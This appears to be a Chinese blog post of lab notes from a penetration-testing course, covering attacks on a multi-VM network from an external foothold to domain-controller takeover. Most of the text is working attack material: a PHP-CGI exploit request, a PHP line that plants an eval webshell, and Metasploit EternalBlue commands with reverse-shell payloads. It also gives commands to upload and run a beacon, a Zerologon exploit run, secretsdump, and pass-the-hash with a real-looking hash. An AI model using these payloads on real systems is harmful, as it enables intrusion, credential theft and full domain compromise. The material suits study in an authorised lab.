当前位置: 首页 > article >正文

DAY196-vpc1-小迪安全

相关帐号密码见虚拟机描述:

例课程演示:

vmware网卡设置:

vmware8/NAT 对应192.168.139.0网段

vmware2对应192.168.2.0网段

vmware3对应192.168.3.0网段

vmware10对应192.168.10.0网段

记得开启里面的xampp和weblogic服务在做实验

那么网络配置如下:

Windows Server 2012

配置NAT一块 + vmware2一块

Windows 7

配置vmware2

Windows 10

配置vmware2 + vmware3

Windows Server 2012 R2(weblogic 单机)

配置vmware3 + vmware11

Windows Server 2012-WEB

配置vmware11

Windows Server 2016-AD-2016

配置vmware11

一、外网打点PHP-GGC

1、cve-2024

https://blog.csdn.net/huangyongkang666/article/details/139659619

Poc

POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+allow_url_include%3Don+%ADd+auto_prepend_file%3Dphp%3A//input HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Host: 127.0.0.1

Content-Type: application/x-www-form-urlencoded

Redirect-Status: 1

Content-Length: 22

<?php system('dir');?>

2、上线木马到哥斯拉

<?php file_put_contents('..\htdocs\xd.php','<?php eval($_POST["pass"]);?>');?>

3、上线哥斯拉

上传木马

3、端口扫描,扫描存活主机

目标2.128-win7

由于防火墙的原因扫描的端口没有扫描到

二、ms17010攻击

1、msf17010扫描

2、转发到msf

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0     #如果为云服务,则填写公网ip地址

set lport 1112        #cs上设置的

3、msf利用ms17010

run autoroute -p

run post/multi/manage/autoroute

 扫描模块位置:

 auxiliary/scanner/smb/smb_ms17_010    

 攻击代码位置:

 exploit/windows/smb/ms17_010_eternalblue

 exploit/windows/smb/ms17_010_eternalblue_win8  

 exploit/windows/smb/ms17_010_psexec            

 exploit/windows/smb/smb_doublepulsar_rce

!!防火墙原因,win10反向上线win7

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp   

//设置payload,后面是payload的的类型,可以通过 show payloads 命令查看

set RHOSTS 192.168.2.128     //设置被攻击者的IP

set lhost 192.168.2.140    //设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell,win7的2网段ip

set lport 1113

run

Msf上设置监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_http  //ms17010上一直的payload

set lhost 192.168.2.140     #kali上的

set lport 1113        #ms17010上的监听地址

use exploit/windows/smb/ms17_010_eternalblue

3、上线cs

转发上线

监听自己,反向上线

upload /home/kali/2.exe c:\\2.exe

execute -f c:\\2.exe

三、横向移动拿下win10

抓取明文报错

1、向下提权

Navicat密码凭证泄露

2、密码横向移动

创建正向监听器,由于win7限制入站不可以反向监听

四、win2012的weblogic漏洞利用

1、建立socks代理

注意为kali的

2、漏洞利用

3、转发上线

192.168.3.128

转发上线

五、win2012(10.10)横向移动

防火墙为win2012入站不允许,正向连接

六、拿下域控

Cve-2020-1472

1、建立代理

修改host文件

proxychains4 python3 cve-2020-1472-exploit.py dc 192.168.10.10

3、获取域内HASH:

proxychains4 python3 secretsdump.py dc\$@192.168.10.10 -just-dc -no-pass

python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

使用administrator的hash值来连接DC

后续下载后门上线CS或者其他方式上线CS

4、横向移动拿下域控


http://www.kler.cn/a/464415.html

相关文章:

  • HarmonyOS NEXT 应用开发练习:智能视频推荐
  • pdf预览兼容问题- chrome浏览器105及一下预览不了
  • 鸿蒙设置字体或者背景颜色渐变
  • 【SOC 芯片设计 DFT 学习专栏 -- DFT std logic 介绍 】
  • IP-MS常见问题(一)
  • std::shared_mutex学习
  • 二叉树遍历:C++ 实现指南
  • Python的*args和**kwargs
  • Word如何插入图片并移动到某个位置
  • 173. 矩阵距离 acwing -多路BFS
  • 【 IEEE 独立出版 · EI核心、Scopus稳定检索 】第二届算法、软件工程与网络安全国际学术会议(ASENS 2025)
  • Hive集成Iceberg碰到的问题
  • Bash 中的 2>1 | tee 命令详解
  • java实现预览服务器文件,不进行下载,并增加水印效果
  • 《Vue3实战教程》37:Vue3生产部署
  • 【SpringBoot教程】搭建SpringBoot项目之编写pom.xml
  • 《Java 数据结构》
  • spring-boot启动源码分析(二)之SpringApplicationRunListener
  • redis的学习(一)
  • 【人工智能机器学习基础篇】——深入详解无监督学习之聚类,理解K-Means、层次聚类、数据分组和分类